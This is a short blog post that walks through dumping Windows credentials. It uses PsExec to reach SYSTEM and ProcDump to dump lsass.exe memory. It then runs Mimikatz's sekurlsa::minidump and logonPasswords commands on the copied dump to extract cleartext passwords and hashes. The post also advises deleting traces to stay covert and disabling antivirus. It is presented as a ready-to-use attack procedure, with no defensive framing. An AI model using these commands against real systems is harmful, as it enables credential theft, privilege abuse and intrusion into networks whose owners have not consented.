Using Microsoft Tools To Dump Password Hashes

Surprisingly Microsoft supplies you the tools that allow you to dump the lsass.exe and then you can use Mimikatz on the dump file to get a shit load of goodies. Tokens, Plaintext cached domain credentials, etc.

Download Psexec and Procdump

Copy both the Psexec and Procdump zip files to the computer that you want to dump the lsass from and extract the contents of the zip file.

open up command prompt and move to the folder where you extracted the Psexec zip file.

Run the command below to escalate from local admin to NT Authority.

PSEXEC -i -s -d CMD

you can check that you are now NT Authority by doing a whoami and you should get a output like this.

C:\Windows\system32>whoami
nt authority\system

so as NT Authority navigate to where you extracted Procdump and run the command below.

procdump -ma lsass.exe lsassdump

procdump

copy the lsassdump.dmp found in your procdump directory back to your pc ready to run Mimikatz on it.

If your trying to be a little covert, delete any directory s and zip files created in the previouse steps..

Mimikatz

Download Mimikatz from the authors site .

Extract the contents of the zip file “be careful Anti Virus will pick this up as a virus so disable if needed”.

Run Mimikatz

Type “sekurlsa::Minidump (location of lsassdump.dmp)”

Lastly type “sekurlsa::logonPasswords”

you can get mimikatz to display a log file of all it finds by typing “log”in the mimikatz console first.

and that is it Mimikatz will run through the dump file and within a second or so you will get all the tasty clear text passwords and hashes you required.

Note
have not been able to run mimikatz from a windows 10 PC will investigate…

 

One comment

Leave a Reply

Your email address will not be published.